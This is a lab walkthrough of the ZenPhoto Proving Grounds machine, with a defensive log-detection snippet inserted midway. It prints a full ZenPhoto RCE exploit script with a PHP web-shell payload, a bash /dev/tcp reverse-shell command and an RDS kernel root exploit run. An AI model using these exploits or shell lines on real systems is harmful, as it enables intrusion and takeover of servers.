ZenPhoto
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.206.41
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-08 12:46 EST
Nmap scan report for 192.168.206.41
Host is up, received reset ttl 61 (0.12s latency).
Scanned at 2025-11-08 12:46:29 EST for 68s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
| 2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
23/tcp open ipp syn-ack ttl 61 CUPS 1.4
|_http-server-header: CUPS/1.4
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
80/tcp open http syn-ack ttl 61 Apache httpd 2.2.14 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.14 (Ubuntu)
3306/tcp open mysql syn-ack ttl 61 MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>

SSH (22):
We cannot access it because we do not have valid credentials.
? (23):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ telnet 192.168.206.41 23
Trying 192.168.206.41...
Connected to 192.168.206.41.
Escape character is '^]'.
asdf
Connection closed by foreign host.

Nothing.
MySQL (3306):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ mysql -h 192.168.206.41
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.45.174' is not allowed to connect to this MySQL server

We cannot access it from an external IP address.
HTTP (80):

Also nothing. Let's run gobuster to try to identify any hidden directories:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ gobuster dir -u http://192.168.206.41 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.206.41
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 291]
/.hta (Status: 403) [Size: 286]
/.htaccess (Status: 403) [Size: 291]
/cgi-bin/ (Status: 403) [Size: 290]
/index (Status: 200) [Size: 75]
/index.html (Status: 200) [Size: 75]
/server-status (Status: 403) [Size: 295]
/test (Status: 301) [Size: 315] [--> http://192.168.206.41/test/]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
===============================================================

We have a hidden directory named test:

Here we can see it is powered by ZenPhoto.
Let's view the source code:

From the source we get the version of the running application.
Search for any public exploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ searchsploit zenphoto 1.4.1.4
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution | php/webapps/18083.php
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ searchsploit zenphoto 1.4.1
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution | php/webapps/18083.php
ZenPhoto 1.4.10 - Local File Inclusion | php/webapps/38841.txt
ZenPhoto 1.4.11 - Remote File Inclusion | php/webapps/39571.txt
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Copy the one with RCE:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ searchsploit -m php/webapps/18083.php
Exploit: ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution
URL: https://www.exploit-db.com/exploits/18083
Path: /usr/share/exploitdb/exploits/php/webapps/18083.php
Codes: OSVDB-76928, CVE-2011-4825
Verified: True
File Type: PHP script, ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/ZenPhoto/18083.php

Read that script:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ cat 18083.php
<?php
<snipped>
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No response from {$host}:80\n");
    fwrite($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+-----------------------------------------------------------+";
print "\n| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /zenphoto/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet  = "POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);

$packet  = "GET {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
    print "\nzenphoto-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}
?>

Exploitation:
Let's run that script, passing the target's IP and the web root path of the application:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
Usage......: php 18083.php <host> <path>
Example....: php 18083.php localhost /
Example....: php 18083.php localhost /zenphoto/
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php 192.168.206.41 /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# whoami
www-data

We confirmed we have remote command execution.
Let's get a reverse shell:
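From the defender's side, this exchange leaves a distinctive trace in the web server's access log: a POST to ajax_create_folder.php followed shortly by GETs to inc/data.php from the same client. As an added example (not part of the original write-up or of the exploit script), here is a small Python detector over constructed Apache combined-log lines; the endpoint paths come from 18083.php above, while the sample IPs and timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Endpoints abused by the ZenPhoto 1.4.1.4 exploit (CVE-2011-4825), as seen in 18083.php:
# stage 1 POSTs PHP into ajax_create_folder.php, stage 2 fetches inc/data.php to run it.
PLUGIN_DIR = "/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/"
STAGE1_POST = PLUGIN_DIR + "ajax_create_folder.php"
STAGE2_GET = PLUGIN_DIR + "inc/data.php"

# Apache combined log format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m["time"].split()[0], "%d/%b/%Y:%H:%M:%S")  # tz offset dropped
    return {"ip": m["ip"], "time": when, "method": m["method"], "path": m["path"].split("?")[0]}

def detect(lines, window=timedelta(minutes=10)):
    """Return [(ip, first_hit_time)] for clients that POST to ajax_create_folder.php and
    then request inc/data.php within `window` (the two-stage pattern of the exploit)."""
    posts = defaultdict(list)  # ip -> timestamps of stage-1 POSTs
    alerted = {}
    for e in filter(None, map(parse_line, lines)):
        if e["method"] == "POST" and e["path"].endswith(STAGE1_POST):
            posts[e["ip"]].append(e["time"])
        elif e["method"] == "GET" and e["path"].endswith(STAGE2_GET) and e["ip"] not in alerted:
            if any(timedelta(0) <= e["time"] - t <= window for t in posts[e["ip"]]):
                alerted[e["ip"]] = e["time"].isoformat()
    return sorted(alerted.items())

SAMPLE_LOG = [  # constructed sample lines; IPs and times are made up
    '203.0.113.5 - - [08/Nov/2025:12:50:01 -0500] "GET /test/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Nov/2025:12:51:10 -0500] "POST /test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0" 200 31 "-" "-"',
    '198.51.100.7 - - [08/Nov/2025:12:51:11 -0500] "GET /test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0" 200 58 "-" "-"',
    '198.51.100.7 - - [08/Nov/2025:12:51:40 -0500] "GET /test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0" 200 16 "-" "-"',
    '203.0.113.5 - - [08/Nov/2025:12:52:00 -0500] "GET /test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when in detect(SAMPLE_LOG):
        print(f"[!] two-stage ajaxfilemanager exploit pattern from {ip}, first hit {when}")
```

The lone GET to inc/data.php from 203.0.113.5 is not flagged because that client never sent the stage-1 POST; a stricter rule could alert on any request under the ajaxfilemanager path from outside the admin's network.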
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ nc -nlvp 80
listening on [any] 80 ...

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ php 18083.php 192.168.206.41 /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# bash -c 'bash -i >& /dev/tcp/192.168.45.174/80 0>&1'
[-] Exploit failed!

The script reports failure because the reverse-shell command never returns output to it, but the listener has already received the connection:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.206.41] 35026
bash: no job control in this shell
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ python -c 'import pty;pty.spawn("/bin/bash")'
<ins/ajaxfilemanager/inc$ python -c 'import pty;pty.spawn("/bin/bash")'
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ export TERM=xterm
export TERM=xterm
<p-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ stty -a
speed 38400 baud; rows 43; columns 172; line = 0;
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ZenPhoto]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
www-data@offsecsrv:/var/www/test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc$ stty rows 43 columns 172
www-data@offsecsrv:/var/www/test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc$

Post-Exploitation:
After doing some local enumeration, we find that the kernel version of the operating system is old:
www-data@offsecsrv:/dev/shm$ uname -a
Linux offsecsrv 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
www-data@offsecsrv:/dev/shm$ cat /etc/issue
Ubuntu 10.04.3 LTS \n \l

Searching online, we find this GitHub repo:

We find our kernel version listed under one of the rds exploit entries:

Let's click on that blue "rds" link:
I will use one of the scripts:
www-data@offsecsrv:/dev/shm$ cat exploit.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
<snipped>
printf("[*] Got root!\n");
execl("/bin/sh", "sh", NULL);
}

Compile it and execute it:
www-data@offsecsrv:/dev/shm$ gcc exploit.c -o exploit
www-data@offsecsrv:/dev/shm$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
root

We are root.
Get the flags:
# cd /root
# ls -la
total 44
drwx------ 5 root root 4096 Nov 8 12:45 .
drwxr-xr-x 22 root root 4096 Aug 2 2024 ..
-rw------- 1 root root 0 Sep 8 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 23 2010 .bashrc
drwx------ 2 root root 4096 Nov 9 2011 .cache
-rw------- 1 root root 42 Nov 9 2011 .lesshst
-rw------- 1 root root 27 Nov 9 2011 .mysql_history
-rw-r--r-- 1 root root 140 Apr 23 2010 .profile
drwxr-xr-x 2 root root 4096 Nov 9 2011 .ssh
drwxr-xr-x 2 root root 4096 Jul 19 2011 .wapi
-r-------- 1 root root 5 Nov 9 2011 mysqlpass
-r-------- 1 root root 33 Nov 8 17:46 proof.txt
# cat proof.txt
b336e3feac22b637e39527b05a7ce36d
# cat /home/local.txt
af91f62b7736a472c1eed2899ef7b7ff